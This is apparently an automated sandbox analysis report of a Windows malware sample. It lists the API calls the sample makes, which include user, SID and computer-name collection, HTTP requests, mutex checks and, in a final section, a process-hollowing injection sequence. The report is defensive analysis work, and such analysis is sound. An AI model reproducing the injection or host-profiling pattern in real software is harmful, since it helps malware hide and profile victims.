                                                                                                                                              • Part of subcall function 00401C20: GetUserNameW.ADVAPI32(00000000,004049C3), ref: 00401C4A
                                                                                                                                              • Part of subcall function 00401C20: GetProcessHeap.KERNEL32(00000008,004049C3), ref: 00401C5F
                                                                                                                                              • Part of subcall function 00401C20: HeapAlloc.KERNEL32(00000000), ref: 00401C62
                                                                                                                                              • Part of subcall function 00401C20: GetUserNameW.ADVAPI32(00000000,004049C3), ref: 00401C70
                                                                                                                                              • Part of subcall function 00401C20: LookupAccountNameW.ADVAPI32(00000000,?,00000000,004049C3,00000000,?,?), ref: 00401C93
                                                                                                                                              • Part of subcall function 00401C20: GetProcessHeap.KERNEL32(00000008,004049C3), ref: 00401C9E
                                                                                                                                              • Part of subcall function 00401C20: HeapAlloc.KERNEL32(00000000), ref: 00401CA1
                                                                                                                                              • Part of subcall function 00401C20: GetProcessHeap.KERNEL32(00000008,?), ref: 00401CB1
                                                                                                                                              • Part of subcall function 00401C20: HeapAlloc.KERNEL32(00000000), ref: 00401CB4
                                                                                                                                              • Part of subcall function 00401C20: LookupAccountNameW.ADVAPI32(00000000,?,00000000,004049C3,00000000,?,?), ref: 00401CDE
                                                                                                                                              • Part of subcall function 00401C20: ConvertSidToStringSidW.ADVAPI32(00000000,00000000), ref: 00401CF1
                                                                                                                                            • LoadLibraryA.KERNEL32(00000000), ref: 0040B09A
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,000002A8), ref: 0040B0F4
                                                                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 0040B0FF
                                                                                                                                            • GetUserNameW.ADVAPI32(?,?), ref: 0040B134
                                                                                                                                            • GetComputerNameExW.KERNEL32(00000002,?,00000100,00000000,?,?), ref: 0040B214
                                                                                                                                              • Part of subcall function 0040DCC0: Concurrency::cancel_current_task.LIBCPMT ref: 0040DD74
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.922526659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.922732648.0000000000431000.00000040.00020000.sdmp
                                                                                                                                            Similarity
                                                                                                                                            • API ID: HeapName$AllocProcessUser$AccountLibraryLookupVersion$AddressComputerConcurrency::cancel_current_taskConvertFreeLoadProcString
                                                                                                                                            • String ID: 152138533219$6b3c86
                                                                                                                                            • API String ID: 1144133639-628519087
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0222024D
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.924566001.0000000002220000.00000040.00000001.sdmp, Offset: 02220000, based on PE: false
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AllocVirtual
                                                                                                                                            • String ID: cess$kernel32.dll
                                                                                                                                            • API String ID: 4275171209-1230238691
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            • W. Europe Daylight Time, xrefs: 0041D914
                                                                                                                                            • W. Europe Standard Time, xrefs: 0041D8E5
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.922526659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.922732648.0000000000431000.00000040.00020000.sdmp
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _free$InformationTimeZone
                                                                                                                                            • String ID: W. Europe Daylight Time$W. Europe Standard Time
                                                                                                                                            • API String ID: 597776487-986674615
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • GetTempPathW.KERNEL32(00000104,?,00000000,?), ref: 0040421E
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.922526659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.922732648.0000000000431000.00000040.00020000.sdmp
                                                                                                                                            Similarity
                                                                                                                                            • API ID: PathTemp
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2920410445-0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 004041F0: GetTempPathW.KERNEL32(00000104,?,00000000,?), ref: 0040421E
                                                                                                                                            • GetFileAttributesA.KERNELBASE(00000000), ref: 0040535F
                                                                                                                                            • GetFileAttributesA.KERNELBASE(00000000), ref: 004055AD
                                                                                                                                            • GetFileAttributesA.KERNELBASE(00000000), ref: 004056D4
                                                                                                                                            • GetFileAttributesA.KERNELBASE(00000000), ref: 004057FB
                                                                                                                                              • Part of subcall function 00403C30: GetVersionExW.KERNEL32(0000011C,?,?,?), ref: 00403C86
                                                                                                                                            • GetFileAttributesA.KERNELBASE(00000000), ref: 00405486
                                                                                                                                              • Part of subcall function 0040DCC0: Concurrency::cancel_current_task.LIBCPMT ref: 0040DD74
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.922526659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.922732648.0000000000431000.00000040.00020000.sdmp
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AttributesFile$Concurrency::cancel_current_taskPathTempVersion
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 265149320-0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • std::_Xinvalid_argument.LIBCPMT ref: 00408589
                                                                                                                                              • Part of subcall function 004041F0: GetTempPathW.KERNEL32(00000104,?,00000000,?), ref: 0040421E
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.922526659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.922732648.0000000000431000.00000040.00020000.sdmp
                                                                                                                                            Similarity
                                                                                                                                            • API ID: PathTempXinvalid_argumentstd::_
                                                                                                                                            • String ID: "$152138533219$invalid stoi argument$stoi argument out of range
                                                                                                                                            • API String ID: 3948722134-3600082259
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • HttpSendRequestA.WININET(00000000,00000000,?), ref: 00405EDC
                                                                                                                                            • InternetReadFile.WININET(00000000,?,000003FF,?), ref: 00405F6D
                                                                                                                                            • InternetReadFile.WININET(?,00000000,000003FF,?), ref: 00405FF4
                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 00406005
                                                                                                                                            • InternetCloseHandle.WININET(?), ref: 0040600A
                                                                                                                                            • InternetCloseHandle.WININET(?), ref: 0040600F
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.922526659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.922732648.0000000000431000.00000040.00020000.sdmp
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Internet$CloseHandle$FileRead$HttpRequestSend
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 253740277-0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • GetTimeZoneInformation.KERNELBASE(?,00000000,00000000,00000000,?,0042A578), ref: 0041D876
                                                                                                                                            • _free.LIBCMT ref: 0041D864
                                                                                                                                              • Part of subcall function 004154C1: HeapFree.KERNEL32(00000000,00000000,?,0041B759,00000000,00000000,00000000,E80042EF,?,0041B780,00000000,00000007,00000000,?,0041BB82,00000000), ref: 004154D7
                                                                                                                                              • Part of subcall function 004154C1: GetLastError.KERNEL32(00000000,?,0041B759,00000000,00000000,00000000,E80042EF,?,0041B780,00000000,00000007,00000000,?,0041BB82,00000000,00000000), ref: 004154E9
                                                                                                                                            • _free.LIBCMT ref: 0041DA30
                                                                                                                                            Strings
                                                                                                                                            • W. Europe Daylight Time, xrefs: 0041D914
                                                                                                                                            • W. Europe Standard Time, xrefs: 0041D8E5
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.922526659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.922732648.0000000000431000.00000040.00020000.sdmp
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _free$ErrorFreeHeapInformationLastTimeZone
                                                                                                                                            • String ID: W. Europe Daylight Time$W. Europe Standard Time
                                                                                                                                            • API String ID: 2155170405-986674615
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • GetFileType.KERNELBASE(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00411735), ref: 00411825
                                                                                                                                            • GetFileInformationByHandle.KERNELBASE(?,?), ref: 0041187F
                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00411735,?,000000FF,00000000,00000000), ref: 0041190D
                                                                                                                                            • __dosmaperr.LIBCMT ref: 00411914
                                                                                                                                            • PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 00411951
                                                                                                                                              • Part of subcall function 00411B79: __dosmaperr.LIBCMT ref: 00411BAE
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.922526659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.922732648.0000000000431000.00000040.00020000.sdmp
                                                                                                                                            Similarity
                                                                                                                                            • API ID: File__dosmaperr$ErrorHandleInformationLastNamedPeekPipeType
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1206951868-0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • CreateDirectoryA.KERNELBASE(00000000,00000000), ref: 00408763
                                                                                                                                            • Sleep.KERNEL32(00001388), ref: 0040944F
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.922526659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.922732648.0000000000431000.00000040.00020000.sdmp
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateDirectorySleep
                                                                                                                                            • String ID: 152138533219
                                                                                                                                            • API String ID: 3988616660-2264522534
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000), ref: 00406E95
                                                                                                                                            • GetFileAttributesA.KERNEL32(?), ref: 00406EA7
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.922526659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.922732648.0000000000431000.00000040.00020000.sdmp
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AttributesCreateDirectoryFile
                                                                                                                                            • String ID: RQ-}
                                                                                                                                            • API String ID: 3401506121-3262761053
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.922526659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.922732648.0000000000431000.00000040.00020000.sdmp
                                                                                                                                            Similarity
                                                                                                                                            • API ID: PathTemp
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2920410445-0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.922526659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.922732648.0000000000431000.00000040.00020000.sdmp
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _free
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 269201875-0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • _free.LIBCMT ref: 0041D9DA
                                                                                                                                            • _free.LIBCMT ref: 0041DA30
                                                                                                                                              • Part of subcall function 0041D80C: _free.LIBCMT ref: 0041D864
                                                                                                                                              • Part of subcall function 0041D80C: GetTimeZoneInformation.KERNELBASE(?,00000000,00000000,00000000,?,0042A578), ref: 0041D876
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.922526659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.922732648.0000000000431000.00000040.00020000.sdmp
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _free$InformationTimeZone
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 597776487-0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • FindCloseChangeNotification.KERNELBASE(00000000,00000000,00403AF0,?,00415542,00403AF0,0042CFD8,0000000C,004155F4,0042CEB8), ref: 0041566A
                                                                                                                                            • GetLastError.KERNEL32(?,00415542,00403AF0,0042CFD8,0000000C,004155F4,0042CEB8), ref: 00415674
                                                                                                                                            • __dosmaperr.LIBCMT ref: 0041569F
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.922526659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.922732648.0000000000431000.00000040.00020000.sdmp
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ChangeCloseErrorFindLastNotification__dosmaperr
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 490808831-0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.922526659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.922732648.0000000000431000.00000040.00020000.sdmp
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _free
                                                                                                                                            • String ID: ^SA
                                                                                                                                            • API String ID: 269201875-154051897
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • GetFileAttributesA.KERNELBASE(00000000), ref: 00404B4E
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.922526659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.922732648.0000000000431000.00000040.00020000.sdmp
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AttributesFile
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3188754299-0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • GetFileAttributesA.KERNELBASE(00000000), ref: 00404C75
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.922526659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.922732648.0000000000431000.00000040.00020000.sdmp
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AttributesFile
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3188754299-0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • GetFileAttributesA.KERNELBASE(00000000), ref: 00404FEA
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.922526659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.922732648.0000000000431000.00000040.00020000.sdmp
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AttributesFile
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3188754299-0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • GetFileAttributesA.KERNELBASE(00000000), ref: 00405111
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.922526659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.922732648.0000000000431000.00000040.00020000.sdmp
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AttributesFile
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3188754299-0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • CreateMutexW.KERNELBASE(00000000,00000000,?), ref: 00404A51
                                                                                                                                            • GetLastError.KERNEL32(?,00000000), ref: 00404A57
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.922526659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.922732648.0000000000431000.00000040.00020000.sdmp
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateErrorLastMutex
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1925916568-0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.922526659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.922732648.0000000000431000.00000040.00020000.sdmp
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • FileTimeToSystemTime.KERNEL32(00000000,?,?,?,?,004118AA,?,?,00000000,00000000), ref: 004119A1
                                                                                                                                            • SystemTimeToTzSpecificLocalTime.KERNELBASE(00000000,?,?,?,?,?,004118AA,?,?,00000000,00000000), ref: 004119B5
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.922526659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.922732648.0000000000431000.00000040.00020000.sdmp
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Time$System$FileLocalSpecific
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1707611234-0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • Sleep.KERNELBASE(00001388), ref: 00407096
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.922526659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.922732648.0000000000431000.00000040.00020000.sdmp
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Sleep
                                                                                                                                            • String ID: RQ-}
                                                                                                                                            • API String ID: 3472027048-3262761053
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.922526659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.922732648.0000000000431000.00000040.00020000.sdmp
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _free
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 269201875-0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • SetErrorMode.KERNELBASE(00000400,?,?,02220223,?,?), ref: 02220E02
                                                                                                                                            • SetErrorMode.KERNELBASE(00000000,?,?,02220223,?,?), ref: 02220E07
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.924566001.0000000002220000.00000040.00000001.sdmp, Offset: 02220000, based on PE: false
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorMode
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2340568224-0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • CreateDirectoryA.KERNELBASE(00000000,00000000), ref: 00408763
                                                                                                                                            • Sleep.KERNEL32(00001388), ref: 0040944F
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.922526659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.922732648.0000000000431000.00000040.00020000.sdmp
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateDirectorySleep
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3988616660-0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 0040DD74
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.922526659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.922732648.0000000000431000.00000040.00020000.sdmp
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Concurrency::cancel_current_task
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 118556049-0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.922526659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.922732648.0000000000431000.00000040.00020000.sdmp
                                                                                                                                            Similarity
                                                                                                                                            • API ID: __wsopen_s
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3347428461-0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.922526659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.922732648.0000000000431000.00000040.00020000.sdmp
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.922526659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.922732648.0000000000431000.00000040.00020000.sdmp
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _free
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 269201875-0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00415F54,00000001,00000364,00000008,000000FF,?,?,0040EBD3,0040D31C,?,0040DD48,E80042F0), ref: 00419C90
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.922526659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.922732648.0000000000431000.00000040.00020000.sdmp
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AllocateHeap
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1279760036-0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 004041F0: GetTempPathW.KERNEL32(00000104,?,00000000,?), ref: 0040421E
                                                                                                                                            • GetFileAttributesA.KERNELBASE(00000000), ref: 0040861C
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.922526659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.922732648.0000000000431000.00000040.00020000.sdmp
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AttributesFilePathTemp
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3199926297-0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • RtlAllocateHeap.NTDLL(00000000,0040D31C,?,?,0040EBD3,0040D31C,?,0040DD48,E80042F0,73B76490), ref: 004159DC
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.922526659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.922732648.0000000000431000.00000040.00020000.sdmp
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AllocateHeap
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1279760036-0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • CreateFileW.KERNELBASE(00000000,00000000,?,0041CB60,?,?,00000000,?,0041CB60,00000000,0000000C), ref: 0041C78D
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.922526659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.922732648.0000000000431000.00000040.00020000.sdmp
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateFile
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 823142352-0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.922526659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.922732648.0000000000431000.00000040.00020000.sdmp
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • Sleep.KERNELBASE(0000EA60), ref: 0040D39B
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.922526659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.922732648.0000000000431000.00000040.00020000.sdmp
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Sleep
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3472027048-0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • Sleep.KERNELBASE(0000EA60), ref: 0040D34B
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.922526659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.922732648.0000000000431000.00000040.00020000.sdmp
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Sleep
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3472027048-0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • Sleep.KERNELBASE(0000EA60), ref: 0040D3EB
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.922526659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.922732648.0000000000431000.00000040.00020000.sdmp
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Sleep
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3472027048-0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Non-executed Functions

                                                                                                                                            APIs
                                                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,00000000,00000000), ref: 004020EC
                                                                                                                                            • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00402145
                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0040215E
                                                                                                                                            • GetThreadContext.KERNEL32(?,00000000), ref: 00402173
                                                                                                                                            • ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00402196
                                                                                                                                            • GetModuleHandleA.KERNEL32(ntdll.dll,NtUnmapViewOfSection), ref: 004021AE
                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 004021B5
                                                                                                                                            • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040), ref: 004021D4
                                                                                                                                            • WriteProcessMemory.KERNEL32(?,00000000,?,?,00000000), ref: 004021EF
                                                                                                                                            • WriteProcessMemory.KERNEL32(?,?,?,?,00000000,?,?,00000000), ref: 0040222C
                                                                                                                                            • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000,?,?,00000000), ref: 0040225C
